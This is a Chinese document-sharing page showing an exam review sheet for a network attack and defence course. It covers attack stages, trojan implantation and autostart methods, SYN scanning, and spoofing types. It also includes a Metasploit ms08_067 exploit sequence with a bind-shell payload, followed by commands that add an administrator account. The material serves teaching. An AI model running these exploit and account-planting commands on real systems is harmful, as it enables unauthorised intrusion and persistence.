1 / 8
文档名称:

网络攻防期末复习.doc

格式:doc   页数:8页
下载后只包含 1 个 DOC 格式的文档,没有任何的图纸或源代码,查看文件列表

如果您已付费下载过本站文档,您可以点这里二次下载

分享

预览

网络攻防期末复习.doc

上传人:012luyin 2014/11/22 文件大小:0 KB

下载得到文件列表

网络攻防期末复习.doc

文档介绍

文档介绍:填空简答综合
简述网络攻击的一般步骤
隐藏IP
踩点扫描
获得系统或管理员权限
种植***
清除痕迹
画出一般网络攻击的路线图
简述5种攻击阶段使用的攻击方法
缓冲区溢出攻击
脚本程序漏洞攻击
口令攻击
错误及弱配置攻击
网络欺骗与劫持攻击
简述5种***方式
社会工程学
漏洞溢出
口令破解
SQL注入
木马
简述木马攻击的一般步骤
答:
配置木马
传播木马
运行木马
信息泄露
建立连接
远程控制
木马分别有哪些植入技术和加载技术?
主动植入:本地安装、远程安装(利用系统漏洞和第三方软件漏洞)
被动植入:
网页浏览植入
利用电子邮件植入
利用网络下载植入
利用即时通工具植入
与其它程序捆绑
利用移动存储设备植入
在Windows系统中木马程序的自动加载技术主要有:
修改系统文件
修改系统注册表
添加系统服务
修改文件打开关联属性
修改任务计划
修改组策略
利用系统自动运行的程序
修改启动文件夹
替换系统DLL
简述TCP SYN扫描的原理
Half open scan 在3次握手完成前终止连接。发SYN,如果收到RST,说明端口关闭。如果收到SYN ACK,说明端口开放,发送RST。
被扫描主机
开放的端口
不提供服务的端口
防火墙过滤的端口
扫描器
SYN
SYN
SYN
SYN+ACK握手
RST 重置
没有回应或者其他
列举网络欺骗的一般方法
DNS欺骗邮件欺骗 IP欺骗 arp欺骗网络钓鱼(web欺骗)
Metasploit 渗透测试步骤
1. 创建项目
2. 发现设备
3. 获取对主机的访问权限
4. 控制会话
5. 从目标主机收集证据
6. 清除会话
7. 生成报告
使用Metasploit 的某攻击过程如下,简述各步骤的主要功能。
search ms08_067
use windows/smb/api
show payloads
set PAYLOAD windows/shell_bind_tcp
show options
set RHOST
Exploit
溢出成功后
Ipconfig /all
Net user abc 123 /add
Net localgroup administrators abc /add
常用扫描工具的主要功能
运行在VMware虚拟机软件上操作系统的网络连接方式有三种
VMWare提供了三种工作模式,它们是bridged(桥接模式)、NAT(网络地址转换模式)和host-only(主机模式)。要想在网络管理和维护中合理应用它们,你就应该先了解一下这三种工作模式。
(桥接模式)
在这种模式下,VMWare虚拟出来的操作系统就像是局域网中的一***立的主机,它可以访问网内任何一台机器。在桥接模式下,你需要手工为虚拟系统配置IP地址、子网掩码,而且还要和宿主机器处于同一网段,这样虚拟系统才能和宿主机器进行通信。同时,由于这个虚拟系统是局域网中的一个独立的主机系统,那么就可以手工配置它的
TCP/IP配置信息,以实现通过局域网的网关或路由器访问互联网。
使用桥接模式的虚拟系统和宿主机器的关